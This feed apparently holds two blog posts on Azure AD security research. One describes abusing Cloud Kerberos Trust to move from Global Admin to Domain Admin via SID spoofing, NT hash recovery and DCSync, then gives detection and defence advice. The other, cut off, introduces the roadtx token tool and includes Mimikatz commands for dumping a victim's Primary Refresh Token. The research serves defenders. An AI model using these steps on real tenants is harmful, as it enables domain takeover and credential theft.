<p>Having a Kerberos TGT still leaves a gap in authentication scenarios. After all, what if the user wants to authenticate to a service that doesn’t support Kerberos and only accepts NTLM authentication? For this Windows would need the NT hash to calculate the correct challenge/response for authentication. Having an NT hash implies that there is still a password, something we wanted to avoid by going passwordless in the first place. So Microsoft came up with an extension to the Kerberos protocol that allows Windows to obtain the NT hash of a user when exchanging a (partial) TGT signed using a secondary <code class="language-plaintext highlighter-rouge">krbtgt</code> key for a full one signed with the primary <code class="language-plaintext highlighter-rouge">krbtgt</code> key. Note that while this is only possible with secondary <code class="language-plaintext highlighter-rouge">krbtgt</code> keys signed tickets, this scenario is specifically designed for passwordless authentication and real RODCs do not use these protocol extensions. The exchange process, including the NT hash recovery was researched by <a href="https://twitter.com/0xdeaddood">Leandro Cuozzo</a>, who wrote a nice <a href="https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/">technical blog</a> about it and added support for this to the impacket library.</p>

<p>The key in this process is including the <code class="language-plaintext highlighter-rouge">KERB-KEY-LIST-REQ</code> field in the PADATA part of the request. This behaviour is documented in <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/732211ae-4891-40d3-b2b6-85ebd6f5ffff">MS-KILE</a> and indicates that if encountered, the KDC should include the long-term secrets in the reply. The long-term secrets in this case being the NT hash of the user accounts password (I have tried to recover the AES keys too this way, but that does not seem to work). As we can see in the screenshot in the previous section, Windows does include this in the request as the PA-DATA type 161. If we look at the response below, we see that the NT hash is included in the encrypted part of the response. Windows can decrypt this using the TGT session key and load the NT hash into memory.</p>

<p><img src="/assets/img/cloudkerberos/tgsrep.png" alt="TGS-REP containing the plain NT hash" class="align-center" /></p>

<h1 id="using-cloud-kerberos-trust-with-roadtx">Using Cloud Kerberos Trust with roadtx</h1>
<p>The process of requesting a PRT for Azure AD or hybrid users has been part of roadtx since its <a href="https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/">release last year</a>. Requesting a PRT will automatically include a request for a TGT, and the resulting TGT will be included in the <code class="language-plaintext highlighter-rouge">.prt</code> file. Roadtx will automatically decrypt the TGT session key as well and include that in the <code class="language-plaintext highlighter-rouge">.prt</code> file so that other tools can use it as well. As an example, I’m obtaining a PRT here for a hybrid account. This assumes I have previously registered or joined a device to this Azure AD tenant, which can be done with the <a href="https://github.com/dirkjanm/ROADtools/wiki/ROADtools-Token-eXchange-%28roadtx%29#devices">roadtx device module</a>, for which the certificate and key is stored in the <code class="language-plaintext highlighter-rouge">talkdevice.pem</code> and <code class="language-plaintext highlighter-rouge">talkdevice.key</code> respectively. Something interesting to note here is that while this mechanism is designed for passwordless authentication methods, Azure AD will also include the TGT if we authenticate with a password. With the password we could as well request a full TGT directly from Active Directory, but this will be relevant later in this blog.</p>

<p><img src="/assets/img/cloudkerberos/hybridprt.png" alt="PRT for hybrid account" class="align-center" /></p>

<p>Because this is an account that exists in both Active Directory and Azure AD, Azure AD includes the partial TGT with the PRT. This TGT can be extracted from the <code class="language-plaintext highlighter-rouge">.prt</code> file and exchanged for a full TGT with some utilities in the <a href="https://github.com/dirkjanm/ROADtools_hybrid">roadtools_hybrid</a> repository, which saves it in a ccache file. Ccache files are compatible with <a href="https://github.com/fortra/impacket">impacket</a>, so we can use the <code class="language-plaintext highlighter-rouge">getST.py</code> script to upgrade our partial TGT to a full one, as long as we have network connectivity to a Domain Controller.</p>

<p><img src="/assets/img/cloudkerberos/loadticket_upgrade.png" alt="Upgrade the TGT" class="align-center" /></p>

<p>This TGT we can use to authenticate to Active Directory connected services. We can also recover the NT hash of the user by using a slightly different script. The <code class="language-plaintext highlighter-rouge">partialtofulltgt.py</code> script in the <code class="language-plaintext highlighter-rouge">roadtools_hybrid</code> toolkit combines both steps, taking either the partial TGT from the <code class="language-plaintext highlighter-rouge">.prt</code> file directly, or loading it from the ccache file that we saved it to. It will also automatically use the <code class="language-plaintext highlighter-rouge">KERB-KEY-LIST-REQ</code> option to ask the DC nicely to put the NT hash in the response:</p>

<p><img src="/assets/img/cloudkerberos/partialtofulltgt.png" alt="Upgrade the TGT with NT hash recovery" class="align-center" /></p>

<p>In this case the NT hash is not really secret since we already knew the password at the beginning, but if we are doing any lateral movement in Azure AD between hybrid identities, having the NT hash could allow us to obtain the password for this user if it is weak enough and we manage to crack it.</p>

<h1 id="abusing-cloud-kerberos-trust-to-obtain-domain-admin">Abusing Cloud Kerberos Trust to obtain Domain Admin</h1>
<p>To abuse the knowledge from the previous sections, we need to take a closer look at how Azure AD determines for which user it would issue a partial TGT and what information to put in this TGT. The Azure Portal shows the various properties of our <code class="language-plaintext highlighter-rouge">hybrid</code> account that are relevant under the “on-premises” section:</p>

<p><img src="/assets/img/cloudkerberos/on_prem_attributes.png" alt="Attributes of the hybrid account relevant for the on-premises sync" class="align-center" /></p>

<p>Azure AD uses the “On-premises SAM account name” and “On-premises security identifier” attributes to generate the ticket. As a Global Admin, one would assume that we can edit those, and maybe obtain a ticket for any user account in the AD domain, including those who are not synced. Modifying these attributes is not as easy as it sounds though, since the Microsoft Graph and the Azure AD Graph both disallow this, indicating these are read-only attributes. There is a third way to update accounts, which is more flexible in what it allows or not. This is the API Active Directory Connect uses to create and update synced users. Normally, this API is only used by “On-Premises Directory Synchronization Service Account”, which has the “Directory Synchronization Accounts” role. As a Global Admin, we could create a new sync account and obtain the same privileges. However, we don’t need to do this since the Global Admin role itself also allows usage of the sync API. I assume this is because the AD Connect account used to be a Global Admin itself, and some environments may still be operating in that way. When analyzing how Azure AD connect updates accounts, we run into this ugly mix of binary and textual data:</p>

<p><img src="/assets/img/cloudkerberos/provisioning.png" alt="Sync account update via provisioning API" class="align-center" /></p>

<p>This is WCF binary xml, a standard used in .NET to transfer XML data in binary format. Lucky for me, there is an open source python parser that was released by <a href="https://github.com/ernw/python-wcfbin">ENRW</a> many years ago. There are even some recent patches for this that <a href="https://github.com/ernw/python-wcfbin/issues/15">fix</a> compatibility issues with the synchronization API, contributed by <a href="https://github.com/AndreasLrx">@AndreasLrx</a> and <a href="https://github.com/sfonteneau">@sfonteneau</a>. Using this library to decode the WCF binary data, we get a much more readable XML document:</p>

<p><img src="/assets/img/cloudkerberos/provisioning_xml.png" alt="Provisioning data in XML format" class="align-center" /></p>

<p>We can use this API call to modify the SAM name and SID of any hybrid user, and then if we authenticate, we get a partial TGT containing the modified SID.</p>

<p><img src="/assets/img/cloudkerberos/newpac.png" alt="Sync account update via provisioning API" class="align-center" /></p>

<p>Note that we can do the same with AADInternals, which also supports the binary XML format, and updates to synced users over this protocol via the <a href="https://aadinternals.com/aadinternals/#set-aadintazureadobject-a">Set-AADIntAzureADObject</a> cmdlet.</p>

<h2 id="attack-prerequisites">Attack prerequisites</h2>
<p>For the attack to succeed and give us Domain Admin privileges, we have a few requirements:</p>

<ul>
  <li>Privileges to modify accounts via the Synchronization API. We already mentioned that Global Admin or AD Connect sync account would work in this case. The Hybrid Identity Administrator role also would provide the neccessary permissions, since this can manage AD Connect and create new sync accounts.</li>
  <li>At least one hybrid account which we can modify and also authenticate to. This could be the same account as in the previous point, but since best practices indicate that hybrid accounts should not have highly privileged roles it is unlikely that the admin account is synced from on-premises.</li>
  <li>A victim account to target in Active Directory. While we could use this attack on any already synced account without the need to modify their attributes, we cannot have duplicate on-premises security identifiers in our Azure AD tenant, so to modify an account and obtain the ticket we need to have an account that is not synced.</li>
</ul>

<p>There are several methods to obtain access to a hybrid account. They all vary slightly in how much noise it generates and whether the real user that we are targeting can keep working or that their authentication will break.</p>

<ul>
  <li>Obtain the password for any synced account (for example using spraying, on-premises lateral movement, etc).</li>
  <li>Reset the password for a hybrid account via an Admin Portal, this would also reset it in Active Directory if password writeback is enabled.</li>
  <li>Change the password for a synchronized Azure AD account using the Synchronization API. This leaves the original password in Active Directory in place, but will cause a disconnect between the password in Azure AD and AD. We could obtain the NT hash for this account via the TGT upgrade request, and if we can recover the original password from the NT hash we could set the password back later.</li>
  <li>Assign passwordless credentials to the account. It used to be possible to provision Windows Hello for Business keys directly on an account, as I talked about <a href="https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_x33fcon.pdf">at various conferences this year</a>, but this has been fixed. An alternative workaround is to assign a Temporary Access Pass (TAP) to an account, set up the passwordless methods that way, and then obtain a PRT with them.</li>
  <li>Create a new user account with a known password via the synchronization API and set the target SID directly.</li>
</ul>

<p>Lastly, we will need an account to target in the on-premises Active Directory that has Domain Admin or equivalent privileges, but is not denied in the replication configuration of the RODC. In any large domain, there are probably several accounts that have equivalent privileges without being explicitly in the Domain Admins group. For this scenario however, we will focus on an account that should be present in any domain that is set up as hybrid. The ideal victim for this attack is in fact the Active Directory account that is used by the AD Connect Sync service. This account is not synced to Azure AD, so its SID is available to target, and it has Domain Admin equivalent privileges because of its ability to synchronize password hashes (assuming Password Hash Sync is in use). If the domain uses the express installation, its name will start with <strong>MSOL_</strong>. If it has a different name, you should be able to find this by listing all the accounts that have Directory Replication privileges on the domain object.</p>

<p><img src="/assets/img/cloudkerberos/replprivs.png" alt="Replication privileges on domain object for MSOL account" class="align-center" /></p>

<h2 id="the-full-attack">The full attack</h2>
<p>Now that we know the requirements, lets go through the full attack. We have a Global Admin account <code class="language-plaintext highlighter-rouge">dirkjan@iminyour.cloud</code> to perform the attack with, and a hybrid account that we can modify to perform our attack <code class="language-plaintext highlighter-rouge">hybrid@hybrid.iminyour.cloud</code>. In this case we know the password for the hybrid account, which is all we need to get a PRT for the account. We also queried the Sync account, which is called <code class="language-plaintext highlighter-rouge">MSOL_9c3bf742d8e9</code> in my tenant and has security identifier <code class="language-plaintext highlighter-rouge">S-1-5-21-1414223725-1888795230-1473887622-1104</code>.</p>

<p>The first step is obtaining an access token for the Global Admin. The synchronization service uses the same resource ID as the Azure AD Graph API, so we can use roadtx to get a token for our admin account. We can do this using the <code class="language-plaintext highlighter-rouge">gettokens</code> command if we don’t need MFA, or use the <code class="language-plaintext highlighter-rouge">interactiveauth</code> to have an interactive window that supports MFA as well. In my example my credentials are stored in a KeePass database so I use the <code class="language-plaintext highlighter-rouge">keepassauth</code> command:</p>

<p><img src="/assets/img/cloudkerberos/roadtx_auth.png" alt="Obtaining an access token for the sync api" class="align-center" /></p>

<p>Next, we can modify the <code class="language-plaintext highlighter-rouge">hybrid@hybrid.iminyour.cloud</code> identity with the <code class="language-plaintext highlighter-rouge">modifyuser.py</code> script from <code class="language-plaintext highlighter-rouge">roadtools_hybrid</code>. An important parameter here is the <code class="language-plaintext highlighter-rouge">SourceAnchor</code>, since this is used to match the user with the Azure AD account. In the portal, this is called the “On-premises immutable ID” and in ROADrecon you can find this as the <code class="language-plaintext highlighter-rouge">immutableId</code> attribute on the user object. We can also use a non-existing <code class="language-plaintext highlighter-rouge">SourceAnchor</code> to create a new user, this just introduces an extra step to add a password to the account. We also supply the target SAM name and desired SID to the tool, which will change these on the <code class="language-plaintext highlighter-rouge">hybrid@hybrid.iminyour.cloud</code> user object:</p>

<p><img src="/assets/img/cloudkerberos/modifycmd.png" alt="Modifying the user SID and SAM" class="align-center" /></p>

<p>We can confirm in the Azure Portal that the users properties have been changed:</p>

<p><img src="/assets/img/cloudkerberos/syncchange.png" alt="New properties in the Azure Portal" class="align-center" /></p>

<p>Now the account is modified and we can request a PRT for this user, including the partial TGT. It is best to wait a minute to make sure our change is synchronized properly, but usually this is quite fast:</p>

<p><img src="/assets/img/cloudkerberos/newprtrequest.png" alt="Requesting a new PRT" class="align-center" /></p>

<p>With the partial TGT we can request the full TGT and recover the NT hash, this time for the MSOL account:</p>

<p><img src="/assets/img/cloudkerberos/msolntrecovery.png" alt="Modifying the user SID and SAM" class="align-center" /></p>

<p>With the full TGT (or the NT hash) we can talk to the Domain Controller and perform a DCSync attack, synchronizing all the hashes, including the hash of the full KRBTGT account, which allows us to forge our own TGTs, essentially elevating our access to full Domain Admin.</p>

<p><img src="/assets/img/cloudkerberos/dcsync.png" alt="Performing DCSync with the MSOL account" class="align-center" /></p>

<p>As a last step, it is advisable to change the account back to its original SAM name and SID using the <code class="language-plaintext highlighter-rouge">modifyuser.py</code>, or to delete the account if we created a new one. This step is optional, since from what I have seen Azure AD connect will pick up the change and reverse the change automatically.</p>

<h1 id="defenses-and-detection">Defenses and detection</h1>
<p>The Cloud Kerberos Trust introduces a trust from Active Directory to Azure AD. If the Azure AD tenant is fully compromised, this would allow attackers to move laterally between synchronized identities via one of the methods from the previous section. This is not something that can be fully prevented, so one of the best defenses here is to use the tools available in Azure AD to protect your highly privileged identities. In addition, highly privileged users should exist in the environment they are managing only. That means no synced accounts in Azure AD administrator roles, and to not sync AD admin accounts to Azure AD.</p>

<p>The RODC object that Azure AD creates also offers some possibilities for defenses. Like a normal RODC, you could add additional accounts and groups to the “Denied password replication” list. If you have highly privileged groups, it would make sense to deny those from Cloud Kerberos Trust, though this does mean they can no longer use passwordless methods to authenticate to on-premises resources since this blocks both the Kerberos authentication as well as the NT hash recovery. In any case, adding accounts that do not need to authenticate with passwordless methods (such as the MSOL sync account) would be a good starting point:</p>

<p><img src="/assets/img/cloudkerberos/aadkerberos_denymsol.png" alt="Preventing abuse of the MSOL account" class="align-center" /></p>

<p>Impersonating an account that is denied will cause the attack to fail with a <code class="language-plaintext highlighter-rouge">KDC_ERR_TGT_REVOKED</code> error.</p>

<p>On the detection side, there is some good and bad news. The bad news is that Azure AD does not log changes to the SAM name and SID property, so you have no way of creating targeted detections for this specific attack. The good news is that there are some ways to still identify parts of it. The change to the hybrid object is logged and shows the actor (our Global Admin) as well as the modified “LastDirSyncTime” property. The “LastDirSyncTime” property only gets updated when the synchronization API is used and not during regular user modifications.</p>

<p><img src="/assets/img/cloudkerberos/syncaudit.png" alt="Audit log showing only the modified timestamp" class="align-center" /></p>

<p>Since in normal operations Global Admin accounts should not be using the synchronization API, this is a clear sign of something irregular going on. The other actions, such as resetting passwords or setting passwordless authentication methods on accounts are part of an admins normal work, so creating detections for those may be more noisy.</p>

<h1 id="tooling-and-credits">Tooling and credits</h1>
<p>The tools are available on the <a href="https://github.com/dirkjanm/ROADtools">ROADtools</a> and <a href="https://github.com/dirkjanm/ROADtools_hybrid">ROADtools hybrid</a> GitHub pages. Thanks to the following people for their prior work:</p>

<ul>
  <li><a href="https://github.com/ernw/python-wcfbin">Timo Schmid</a>, <a href="https://github.com/AndreasLrx">@AndreasLrx</a> and <a href="https://github.com/sfonteneau">@sfonteneau</a> for the python-wcfbin library.</li>
  <li><a href="https://twitter.com/DrAzureAD">DrAzureAD</a> for some helpful details on how the AD Sync protocol works and his implementation in AADInternals.</li>
  <li><a href="https://twitter.com/0xdeaddood">Leandro Cuozzo</a> for his blog on <a href="https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/">Cloud Kerberos Trust and the Key List attack</a>.</li>
</ul>

<p>Lastly, while finalizing this blog I also noticed that <a href="https://twitter.com/hotnops">Daniel Heinsen</a> and <a href="https://twitter.com/elad_shamir">Elad Shamir</a> gave <a href="https://pretalx.com/fwd-cloudsec-2023/talk/8MRJT3/">a talk</a> on a similar topic yesterday. While I have not yet seen the talk, I wanted to give a shout-out to them for their work as well and I’m looking forward to reading their approach on this topic.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[Many modern enterprises operate in a hybrid environment, where Active Directory is used together with Azure Active Directory. In most cases, identities will be synchronized from the on-premises Active Directory to Azure AD, and the on-premises AD remains authoritative. Because of this integration, it is often possible to move laterally towards Azure AD when the on-premises AD is compromised. Moving laterally from Azure AD to the on-prem AD is less common, as most of the information usually flows from on-premises to the cloud. The Cloud Kerberos Trust model is an exception here, since it creates a trust from the on-premises Active Directory towards Azure AD, and thus it trusts information from Azure AD to perform authentication. In this blog we will look at how this trust can be abused by an attacker that obtains Global Admin in Azure AD, to elevate their privileges to Domain Admin in environments that have the Cloud Kerberos Trust set up. Since this technique is a consequence of the design of this trust type, the blog will also highlight detection and prevention measures admins can implement.]]></summary></entry><entry><title type="html">Introducing ROADtools Token eXchange (roadtx) - Automating Azure AD authentication, Primary Refresh Token (ab)use and device registration</title><link href="https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/" rel="alternate" type="text/html" title="Introducing ROADtools Token eXchange (roadtx) - Automating Azure AD authentication, Primary Refresh Token (ab)use and device registration" /><published>2022-11-09T11:08:57+00:00</published><updated>2022-11-09T11:08:57+00:00</updated><id>https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx</id><content type="html" xml:base="https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/"><![CDATA[<p>Ever since the initial release of <a href="https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/">ROADrecon</a> and the ROADtools framework I have been adding new features to it, especially on the authentication side. As a result, it supports many forms of authentication, such as using <a href="https://dirkjanm.io/digging-further-into-the-primary-refresh-token/">Primary Refresh Tokens</a> (PRTs), PRT cookies, and regular access/refresh tokens. The authentication modules are all part of the shared library roadlib, and can be used in other tools by importing the library. Even though you can request tokens for any Azure AD connected resource and with many client IDs, the only tool exposing this authentication part was ROADrecon. It always felt unnatural and illogical to tell people that you can use a recon tool to request tokens for many other purposes. So I decided to start writing a new tool, which resolves around requesting and using Azure AD tokens. As I was working on this, I started adding proof of concepts I wrote during my Azure AD devices research into the tool, adding support for registering devices and requesting Primary Refresh Tokens using device credentials. I also added various modules for injecting PRTs into browser sessions with Selenium, and for automating authentication with MFA. The result is a comprehensive tool called ROADtools Token eXchange, or simply roadtx. Currently it has the following capabilities:</p>

<ul>
  <li>Register and join devices to Azure AD.</li>
  <li>Request Primary Refresh Tokens from user credentials or other valid tokens.</li>
  <li>Use Primary Refresh Tokens in a similar way as the Web Account Manager (WAM) in Windows does.</li>
  <li>Perform several different Oauth2 token redemption flows.</li>
  <li>Perform interactive logins based on Browser SSO by injecting the Primary Refresh Token into the authentication flow.</li>
  <li>Add SSO capabilities to Chrome via the Windows 10 accounts plugin and a custom browsercore implementation.</li>
  <li>Automate sign-ins, MFA and token requesting to various resources in Azure AD by using Selenium.</li>
  <li>Possibility to load credentials and MFA TOTP seeds from a KeePass database to use in (semi-)automated flows.</li>
</ul>

<p>In this blog I will describe the tools features and show some demonstrations of the cool stuff you can do with it. You can also skip directly to <a href="https://github.com/dirkjanm/ROADtools">GitHub</a> or read the <a href="https://github.com/dirkjanm/ROADtools/wiki/ROADtools-Token-eXchange-(roadtx)">Wiki</a> for details on each command.</p>

<h1 id="roadtx-structure">roadtx structure</h1>
<p>roadtx is structured as a wrapper tool around features implemented in roadlib. With the release of roadtx, a new class has been added to roadlib with all device authentication logic, containing functions that register/join devices and can request or use Primary Refresh Tokens in the same way that Windows uses them. In roadtx itself, there is a class with helper functions for <a href="https://www.selenium.dev/">Selenium</a>-based authentication and support for intercepting browser requests to add SSO features to the browser window.</p>

<p>The main function of roadtx itself is about 400 lines of code to construct an (I hope) straightforward collection of commands with their parameters. It also has about 300 lines of code to deal with the commands and call library functions with the data needed. The actual device logic being in roadlib means that it is possible to re-use it in other tools or to make light standalone tools without needing all the roadtx specific dependencies.</p>

<p>I’ve also tried to make it intuitive and straightforward to use roadtx, reducing the command line arguments needed to perform specific actions. For example, <code class="language-plaintext highlighter-rouge">roadtx device</code> will register a device with randomized defaults, and functions dealing with Primary Refresh Tokens will by default load the PRT from a <code class="language-plaintext highlighter-rouge">roadtx.prt</code> file, so you don’t have to specify it every time you use a function.</p>

<h1 id="using-roadtx">Using roadtx</h1>
<h2 id="devices-and-primary-refresh-tokens">Devices and Primary Refresh Tokens</h2>
<p>Most of the modules of roadtx are designed around Primary Refresh Tokens and device identities. To obtain a PRT, we must first register a device in Azure AD. Registering a device requires an access token to the device registration service resource. The access token must be a token without a device claim, so you cannot use single sign-on or an existing PRT to request one. There are a few ways to obtain such a token with roadtx, where some methods support MFA and others do not. MFA could be required to register a device, depending on tenant settings. If it is not, you can request a token for the device registration service (specified here through the <em>devicereg</em> alias) with only a username and password:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx gettokens -u myuser@mytenant.com -p password -r devicereg
</code></pre></div></div>

<p>If MFA is required, you can use the device authentication flow to request the tokens from a browser window somewhere:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx gettokens --device-auth -r devicereg
</code></pre></div></div>

<p>Alternatively, we can already skip ahead a bit to the functionalities shown later in this blog, and use a Selenium based window for MFA, while autofilling the username + password:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx interactiveauth -u myuser@mytenant.com -p password -r devicereg
</code></pre></div></div>

<p>Any of the commands above with save an access token to the <code class="language-plaintext highlighter-rouge">.roadtools_auth</code> file. The device registration command will automatically load it from this file. You can customize what you want for device properties with various commandline parameters to the <code class="language-plaintext highlighter-rouge">roadtx device</code> module:</p>

<p><img src="/assets/img/roadtx/roadtx_device.png" alt="device command" /></p>

<p>We register an Azure AD joined device with the name “blogdevice”:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx device -n blogdevice
Saving private key to blogdevice.key
Registering device
Device ID: 5f138d8b-6416-448d-89ef-9b279c419943
Saved device certificate to blogdevice.pem
</code></pre></div></div>

<p>We get two pieces of data that identify our device. The first is the device certificate saved in <code class="language-plaintext highlighter-rouge">blogdevice.pem</code>, which is issued by Azure AD and identifies our device. The second part is the <code class="language-plaintext highlighter-rouge">blogdevice.key</code> file, which contains the private key of the certificate and is also used as transport key. Now that we have the device certificate, we can do operations that require a device identity. The most useful one is requesting a Primary Refresh Token, since that will enable us to add Single Sign On capabilities to our (interactive or automated) token requests.</p>

<h3 id="requesting-a-primary-refresh-token">Requesting a Primary Refresh Token</h3>
<p>A primary refresh token is most often requested with a username and password. When you log in to an Azure AD joined or hybrid joined workstation with your username and password, Windows immediately requests a PRT from Azure AD. I’ve talked about the technicalities behind this flow at my Troopers and Romhack <a href="/talks/">talks</a> in the past, so if you’re interested in the technicalities have a read through those slides. To request a PRT with roadtx, run the <code class="language-plaintext highlighter-rouge">roadtx prt</code> command, specify the device cert/key and the username + password to use, and you get a PRT:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prt -u myuser@mytenant.com -p password --key-pem blogdevice.key --cert-pem blogdevice.pem
</code></pre></div></div>

<p>The command will give us a PRT (in the form of an encrypted token), and a session key that we need to use the PRT. The PRT is by default saved to <code class="language-plaintext highlighter-rouge">roadtx.prt</code>, where it can be picked up by other roadtx modules.</p>

<p>A PRT is by default valid for 90 days, but we can renew it at any time to extend the validity for another 90 days with the <code class="language-plaintext highlighter-rouge">renew</code> action:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prt -a renew
Renewing PRT
Saved PRT to roadtx.prt
</code></pre></div></div>

<p>Note that the PRT we requested here is only based on a password, so any authentication that requires MFA will fail even if we use the PRT. We can also upgrade or “enrich” the PRT with an MFA claim, this is shown in the next section on Selenium based authentication.</p>

<h3 id="using-primary-refresh-tokens-on-the-command-line">Using Primary Refresh Tokens on the command line</h3>
<p>Once we have a PRT, we can use it to sign in to resources that accept Azure AD authentication. You can do this either with the <code class="language-plaintext highlighter-rouge">roadtx gettokens</code> command, and specify the PRT and session key on the command line, or use the <code class="language-plaintext highlighter-rouge">roadtx prtauth</code> command. The difference between the two is that the <code class="language-plaintext highlighter-rouge">gettokens</code> command implements authentication that is based on how Chrome does Single Sign On in the browser. This method is slightly hacky and if it fails won’t give you any feedback.</p>

<p>The <code class="language-plaintext highlighter-rouge">prtauth</code> module instead emulates the Web Account Manager (WAM) that Windows uses if you request access tokens from an app or native process. The WAM acts like a token broker, and requests tokens on behalf of other clients. It uses a combination of signed requests and encrypted responses to prevent exposing the tokens in transit, all done using the PRT session key. roadtx implements these flows and is able to perform the same authentication. In practice, you can use this module with any client that is either marked as public or has a redirect URL for a native app. By default, the <code class="language-plaintext highlighter-rouge">roadtx prtauth</code> module with use the Azure AD PowerShell Module client ID and the Azure AD graph as resource, but you can specify any other client ID or resource URL either by its full part or as an alias (listable with <code class="language-plaintext highlighter-rouge">roadtx listaliases</code>):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prtauth
Tokens were written to .roadtools_auth
</code></pre></div></div>

<p>Example using the Azure CLI as client ID and requesting tokens for the Azure Resource Manager:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prtauth -c azcli -r azrm     
Tokens were written to .roadtools_auth
</code></pre></div></div>

<p>There’s also other options you can use to specify other resources or the correct redirect URL for the app you are using:</p>

<p><img src="/assets/img/roadtx/roadtx_device.png" alt="prtauth command" /></p>

<h1 id="selenium-based-azure-ad-authentication">Selenium based Azure AD authentication</h1>
<p>Command line based token requests and usage are nice, but often you will encounter some flow that either requires a browser window to do Multi Factor Authentication, or you simply want to use your PRT in an interactive way to browse things like the Azure Portal or just read your mail using a stolen PRT. roadtx supports this in various ways, via methods based on <a href="https://selenium.dev">Selenium</a>. For Selenium based methods to work you first need to download the <a href="https://github.com/mozilla/geckodriver/releases">gecko driver</a> since roadtx uses Selenium and the gecko driver to control the browser window (based on Firefox). You should either put the geckodriver in your PATH, in the directory you run the roadtx commands from, or any other location if you want to specify the path manually each time.</p>

<p>The principle of Selenium based operations in roadtx is simple: it launches a browser window, tries to autofill any credentials that you supplied to the command, and let you fill in the rest by hand. If you have your accounts set up correctly, it will do the authentication fully automatically. I use this frequently for research purposes where dealing with multiple identities, need to get tokens for different resources, and/or am testing with MFA enabled. It can also be used to automatically inject PRTs into the authentication flow and to use them to browse sites with automatic authentication.</p>

<h2 id="interactive-authentication">Interactive authentication</h2>
<p>In the simplest form, roadtx will launch a browser for you, request a token for the indicated service, fill in any credentials you specified, and obtain tokens. Example:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx interactiveauth -u myuser@mytenant.com -p password
</code></pre></div></div>

<p>If MFA is required, you can enter that and obtain a token with MFA claim. If not, it will capture the output and save the requested tokens. You can specify the client ID you want to use with <code class="language-plaintext highlighter-rouge">-c</code> and the resource to authenticate to with <code class="language-plaintext highlighter-rouge">-r</code>. Here’s a short demo:</p>

<video width="100%" controls="">
  <source src="/assets/video/selenium_autofill.mp4" type="video/mp4" />
  <source src="/assets/video/selenium_autofill.webm" type="video/webm" />
</video>

<h2 id="keepass-credentials-based-authentication">KeePass credentials based authentication</h2>
<p>If you’re dealing with many different accounts during research, copy/pasting credentials and entering MFA information becomes quite tedious. roadtx supports sourcing credentials and TOTP based MFA information from a kdbx file (KeePass file) or KeePass XML export. To use this, use the <code class="language-plaintext highlighter-rouge">roadtx keepassauth</code> command. It accepts a KeePass file with the <code class="language-plaintext highlighter-rouge">-kp</code> parameter or if you leave this parameter out it tries to load <code class="language-plaintext highlighter-rouge">roadtx.kdbx</code> from the current directory. The password of the KeePass file can be specified with <code class="language-plaintext highlighter-rouge">-kpp</code> or via the <code class="language-plaintext highlighter-rouge">KPPASS</code> environment variable. The only required parameter is the username, which it will look up in the KeePass file. It will autofill the password and also the OTP code if “Mobile app OTP” is enabled as an MFA method on the account. This requires the TOTP seed to be stored in the <code class="language-plaintext highlighter-rouge">otp</code> additional parameter of the identity in the KeePass file. For instructions on how to set this up and some caveats of using KeePass files, see the <a href="https://github.com/dirkjanm/ROADtools/wiki/ROADtools-Token-eXchange-(roadtx)">roadtx wiki</a>.</p>

<p>Here is another demo of authentication to the Microsoft Graph using an account that requires MFA, the credentials and OTP are automatically loaded from the KeePass file:</p>

<video width="100%" controls="">
  <source src="/assets/video/selenium_kpautofill.mp4" type="video/mp4" />
  <source src="/assets/video/selenium_kpautofill.webm" type="video/webm" />
</video>

<p>Aside from requesting tokens directly, you can also use this as an interactive browser window with auto authentication. To do this, specify a URL manually that will redirect you to the Microsoft sign-in page. For example, using <code class="language-plaintext highlighter-rouge">-url https://myaccount.microsoft.com</code> will open a browser, authenticate you, and go to the “My account” page. You can use <code class="language-plaintext highlighter-rouge">--keep-open</code> to keep the browser window open after authentication, which makes it possible to browse to other pages from an authenticated perspective. Example:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx keepassauth -url https://myaccount.microsoft.com --keep-open -u myuser@mytenant.com -kp accounts.kdbx -kpp keepassfilepassword
</code></pre></div></div>

<h2 id="primary-refresh-token-authentication-in-browser">Primary Refresh Token authentication in browser</h2>
<p>A more interesting scenario is using a Primary Refresh Token that you either registered yourself or that you <a href="https://dirkjanm.io/digging-further-into-the-primary-refresh-token/">stole from a legitimate endpoint</a> during a red team to create an interactive browser experience. Lets assume that we dumped a PRT and session key using Mimikatz from an endpoint (this is only possible if it doesn’t use a Trusted Platform Module). We can use this PRT on the command line, or we can automatically inject that into our Selenium browser session. roadtx does this by proxying the browser traffic through itself and injecting a PRT cookie at various points during authentication. On the victim endpoint, we can use Mimikatz to dump the PRT and session key, with the following commands:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>privilege::debug
sekurlsa::cloudap
</code></pre></div></div>

<p>Mimikatz gives us the PRT and encrypted session key (the <em>KeyValue</em> of the <em>ProofOfPossesionKey</em> field), which we can decrypt from a <code class="language-plaintext highlighter-rouge">SYSTEM</code> context.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>token::elevate
dpapi::cloudapkd /keyvalue:cryptedkey /unprotect
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">cloudapkd</code> function will give us the clear session key (if not stored in TPM), and a derived key. We will need the clear key for roadtx:</p>

